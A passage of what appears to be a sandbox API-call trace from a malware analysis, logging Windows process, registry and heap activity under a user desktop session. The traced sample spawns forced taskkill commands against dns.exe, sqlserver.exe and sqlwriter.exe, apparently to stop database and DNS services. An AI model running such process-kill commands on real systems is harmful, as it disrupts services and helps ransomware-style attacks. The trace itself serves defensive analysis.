_String2="Program", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0055.317] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0055.317] GetProcessHeap () returned 0xb00000 [0055.317] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb07f68) returned 1 [0055.317] GetProcessHeap () returned 0xb00000 [0055.317] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xa) returned 0xb07f68 [0055.317] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0055.318] _get_osfhandle (_FileHandle=1) returned 0x90 [0055.318] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0055.319] _get_osfhandle (_FileHandle=0) returned 0x8c [0055.319] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0055.319] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\taskkill.exe", lpCommandLine="taskkill.exe taskkill /f /im dns.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xaff538*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill.exe taskkill /f /im dns.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xaff584 | out: lpCommandLine="taskkill.exe taskkill /f /im dns.exe", lpProcessInformation=0xaff584*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x770, dwThreadId=0x3fc)) returned 1 [0055.371] CloseHandle (hObject=0xdc) returned 1 [0055.371] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0055.371] GetProcessHeap () returned 0xb00000 [0055.371] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb06c48) returned 1 [0055.371] GetEnvironmentStringsW () returned 0xb06c48* [0055.371] GetProcessHeap () returned 0xb00000 [0055.371] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xb1a) returned 0xb04bc0 [0055.371] FreeEnvironmentStringsA (penv="=") returned 1 [0055.371] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.716] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0xaff51c | out: lpExitCode=0xaff51c*=0x1) returned 1 [0062.717] CloseHandle (hObject=0xe0) returned 1 [0062.717] _vsnwprintf (in: _Buffer=0xaff604, _BufferCount=0x13, _Format="%08X", _ArgList=0xaff524 | out: _Buffer="00000001") returned 8 [0062.717] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0062.718] GetProcessHeap () returned 0xb00000 [0062.718] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb04bc0) returned 1 [0062.718] GetEnvironmentStringsW () returned 0xb04bc0* [0062.718] GetProcessHeap () returned 0xb00000 [0062.718] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xb40) returned 0xb198d8 [0062.722] FreeEnvironmentStringsA (penv="=") returned 1 [0062.722] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0062.722] GetProcessHeap () returned 0xb00000 [0062.722] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb198d8) returned 1 [0062.722] GetEnvironmentStringsW () returned 0xb04bc0* [0062.722] GetProcessHeap () returned 0xb00000 [0062.722] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xb40) returned 0xb198d8 [0062.722] FreeEnvironmentStringsA (penv="=") returned 1 [0062.722] GetProcessHeap () returned 0xb00000 [0062.722] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb07f68) returned 1 [0062.722] DeleteProcThreadAttributeList (in: lpAttributeList=0xaff5b0 | out: lpAttributeList=0xaff5b0) [0062.722] ??_V@YAXPAX@Z () returned 0x1 [0062.722] _get_osfhandle (_FileHandle=1) returned 0x90 [0062.722] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0062.883] _get_osfhandle (_FileHandle=1) returned 0x90 [0062.883] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0063.078] _get_osfhandle (_FileHandle=1) returned 0x90 [0063.078] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0063.266] _get_osfhandle (_FileHandle=0) returned 0x8c [0063.266] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0063.422] _get_osfhandle (_FileHandle=0) returned 0x8c [0063.422] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0063.556] SetConsoleInputExeNameW () returned 0x1 [0063.556] GetConsoleOutputCP () returned 0x1b5 [0063.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0063.685] SetThreadUILanguage (LangId=0x0) returned 0x870409 [0063.801] exit (_Code=1) [0063.801] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 63 os_tid = 0x504 Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7b3000" os_pid = "0x1a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xcb8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0x8f0 Thread: id = 57 os_tid = 0x260 Thread: id = 59 os_tid = 0xe60 Thread: id = 60 os_tid = 0x5cc Thread: id = 61 os_tid = 0x788 Process: id = "16" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0xa8e8000" os_pid = "0x540" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x4b0" cmd_line = "taskkill.exe taskkill /f /im sqlserver.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 62 os_tid = 0xdc4 Thread: id = 64 os_tid = 0x2d0 Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xabdf000" os_pid = "0xb84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb08" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im sqlwriter.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 65 os_tid = 0xd60 [0055.922] GetModuleHandleA (lpModuleName=0x0) returned 0xdf0000 [0055.922] __set_app_type (_Type=0x1) [0055.922] __p__fmode () returned 0x77ae3c14 [0055.922] __p__commode () returned 0x77ae49ec [0055.922] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe06fd0) returned 0x0 [0055.922] __getmainargs (in: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac, _DoWildCard=0, _StartInfo=0xe1d1b8 | out: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac) returned 0 [0055.922] _onexit (_Func=0xe08030) returned 0xe08030 [0055.922] _onexit (_Func=0xe08040) returned 0xe08040 [0055.922] _onexit (_Func=0xe08050) returned 0xe08050 [0055.923] _onexit (_Func=0xe08060) returned 0xe08060 [0055.923] _onexit (_Func=0xe08070) returned 0xe08070 [0055.923] _onexit (_Func=0xe08080) returned 0xe08080 [0055.923] GetCurrentThreadId () returned 0xd60 [0055.923] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd60) returned 0xbc [0055.923] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0055.923] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0055.924] SetThreadUILanguage (LangId=0x0) returned 0x31f0409 [0055.996] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0055.996] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xd1fe4c | out: phkResult=0xd1fe4c*=0x0) returned 0x2 [0055.997] VirtualQuery (in: lpAddress=0xd1fe57, lpBuffer=0xd1fe04, dwLength=0x1c | out: lpBuffer=0xd1fe04*(BaseAddress=0xd1f000, AllocationBase=0xc20000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0055.997] VirtualQuery (in: lpAddress=0xc20000, lpBuffer=0xd1fe04, dwLength=0x1c | out: lpBuffer=0xd1fe04*(BaseAddress=0xc20000, AllocationBase=0xc20000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0055.997] VirtualQuery (in: lpAddress=0xc21000, lpBuffer=0xd1fe04, dwLength=0x1c | out: lpBuffer=0xd1fe04*(BaseAddress=0xc21000, AllocationBase=0xc20000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0055.997] VirtualQuery (in: lpAddress=0xc23000, lpBuffer=0xd1fe04, dwLength=0x1c | out: lpBuffer=0xd1fe04*(BaseAddress=0xc23000, AllocationBase=0xc20000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0055.997] VirtualQuery (in: lpAddress=0xd20000, lpBuffer=0xd1fe04, dwLength=0x1c | out: lpBuffer=0xd1fe04*(BaseAddress=0xd20000, AllocationBase=0xd20000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0055.997] GetConsoleOutputCP () returned 0x1b5 [0056.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0056.036] SetConsoleCtrlHandler (HandlerRoutine=0xe17260, Add=1) returned 1 [0056.036] _get_osfhandle (_FileHandle=1) returned 0x90 [0056.036] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe2388c | out: lpMode=0xe2388c) returned 1 [0056.056] _get_osfhandle (_FileHandle=0) returned 0x8c [0056.056] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23888 | out: lpMode=0xe23888) returned 1 [0056.070] _get_osfhandle (_FileHandle=1) returned 0x90 [0056.070] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0056.076] _get_osfhandle (_FileHandle=1) returned 0x90 [0056.076] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0056.090] _get_osfhandle (_FileHandle=1) returned 0x90 [0056.090] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0056.147] _get_osfhandle (_FileHandle=0) returned 0x8c [0056.147] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0056.163] _get_osfhandle (_FileHandle=0) returned 0x8c [0056.163] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0056.250] GetEnvironmentStringsW () returned 0x2e74bd8* [0056.294] GetProcessHeap () returned 0x2e70000 [0056.294] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xaca) returned 0x2e756b0 [0056.294] FreeEnvironmentStringsA (penv="A") returned 1 [0056.294] GetProcessHeap () returned 0x2e70000 [0056.294] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x4) returned 0x2e746b8 [0056.294] GetEnvironmentStringsW () returned 0x2e74bd8* [0056.294] GetProcessHeap () returned 0x2e70000 [0056.294] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xaca) returned 0x2e76188 [0056.294] FreeEnvironmentStringsA (penv="A") returned 1 [0056.294] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xd1eda8 | out: phkResult=0xd1eda8*=0xcc) returned 0x0 [0056.294] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x0, lpData=0xd1edb4*=0x38, lpcbData=0xd1edac*=0x1000) returned 0x2 [0056.294] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x1, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.294] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x0, lpData=0xd1edb4*=0x1, lpcbData=0xd1edac*=0x1000) returned 0x2 [0056.294] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x0, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.294] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x40, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.294] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x40, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x0, lpData=0xd1edb4*=0x40, lpcbData=0xd1edac*=0x1000) returned 0x2 [0056.295] RegCloseKey (hKey=0xcc) returned 0x0 [0056.295] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xd1eda8 | out: phkResult=0xd1eda8*=0xcc) returned 0x0 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x0, lpData=0xd1edb4*=0x40, lpcbData=0xd1edac*=0x1000) returned 0x2 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x1, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x0, lpData=0xd1edb4*=0x1, lpcbData=0xd1edac*=0x1000) returned 0x2 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x0, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x9, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x4, lpData=0xd1edb4*=0x9, lpcbData=0xd1edac*=0x4) returned 0x0 [0056.295] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xd1edb0, lpData=0xd1edb4, lpcbData=0xd1edac*=0x1000 | out: lpType=0xd1edb0*=0x0, lpData=0xd1edb4*=0x9, lpcbData=0xd1edac*=0x1000) returned 0x2 [0056.295] RegCloseKey (hKey=0xcc) returned 0x0 [0056.295] time (in: timer=0x0 | out: timer=0x0) returned 0x5d302277 [0056.295] srand (_Seed=0x5d302277) [0056.295] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im sqlwriter.exe" [0056.295] malloc (_Size=0x4000) returned 0x35a21f0 [0056.296] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im sqlwriter.exe" [0056.296] malloc (_Size=0xffce) returned 0x33d0048 [0056.296] ??_V@YAXPAX@Z () returned 0xd1fd8c [0056.297] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x33d0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0056.297] malloc (_Size=0xffce) returned 0x33e0020 [0056.297] ??_V@YAXPAX@Z () returned 0xd1fb60 [0056.298] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33e0020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0056.298] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0056.298] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.298] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.298] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0056.298] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0056.298] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0056.298] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0056.298] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0056.298] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0056.298] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0056.298] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0056.298] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0056.299] GetProcessHeap () returned 0x2e70000 [0056.299] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e756b0) returned 1 [0056.299] GetEnvironmentStringsW () returned 0x2e74bd8* [0056.299] GetProcessHeap () returned 0x2e70000 [0056.299] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xae2) returned 0x2e77750 [0056.299] FreeEnvironmentStringsA (penv="A") returned 1 [0056.299] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0056.299] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.299] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0056.299] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0056.299] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0056.299] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0056.299] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0056.299] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0056.299] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0056.299] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0056.299] malloc (_Size=0xffce) returned 0x33efff8 [0056.299] ??_V@YAXPAX@Z () returned 0xd1f8f8 [0056.300] GetProcessHeap () returned 0x2e70000 [0056.300] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x38) returned 0x2e70ae0 [0056.300] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x33efff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0056.300] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x33efff8, lpFilePart=0xd1f944 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xd1f944*="Desktop") returned 0x17 [0056.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0056.301] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xd1f6c8 | out: lpFindFileData=0xd1f6c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2e70b20 [0056.301] FindClose (in: hFindFile=0x2e70b20 | out: hFindFile=0x2e70b20) returned 1 [0056.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xd1f6c8 | out: lpFindFileData=0xd1f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x2e70b20 [0056.301] FindClose (in: hFindFile=0x2e70b20 | out: hFindFile=0x2e70b20) returned 1 [0056.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xd1f6c8 | out: lpFindFileData=0xd1f6c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff77889f, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xff77889f, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x2e70b20 [0056.301] FindClose (in: hFindFile=0x2e70b20 | out: hFindFile=0x2e70b20) returned 1 [0056.301] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0056.301] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0056.301] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0056.302] GetProcessHeap () returned 0x2e70000 [0056.302] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e77750) returned 1 [0056.302] GetEnvironmentStringsW () returned 0x2e74bd8* [0056.302] GetProcessHeap () returned 0x2e70000 [0056.302] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xb1a) returned 0x2e76c60 [0056.302] FreeEnvironmentStringsA (penv="=") returned 1 [0056.302] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x33d0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0056.302] GetProcessHeap () returned 0x2e70000 [0056.302] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e70ae0) returned 1 [0056.302] ??_V@YAXPAX@Z () returned 0x1 [0056.302] ??_V@YAXPAX@Z () returned 0x1 [0056.302] GetProcessHeap () returned 0x2e70000 [0056.302] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x400e) returned 0x2e78d68 [0056.302] GetProcessHeap () returned 0x2e70000 [0056.302] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x62) returned 0x2e77788 [0056.302] GetProcessHeap () returned 0x2e70000 [0056.302] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e78d68) returned 1 [0056.302] GetConsoleOutputCP () returned 0x1b5 [0056.418] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0056.418] GetUserDefaultLCID () 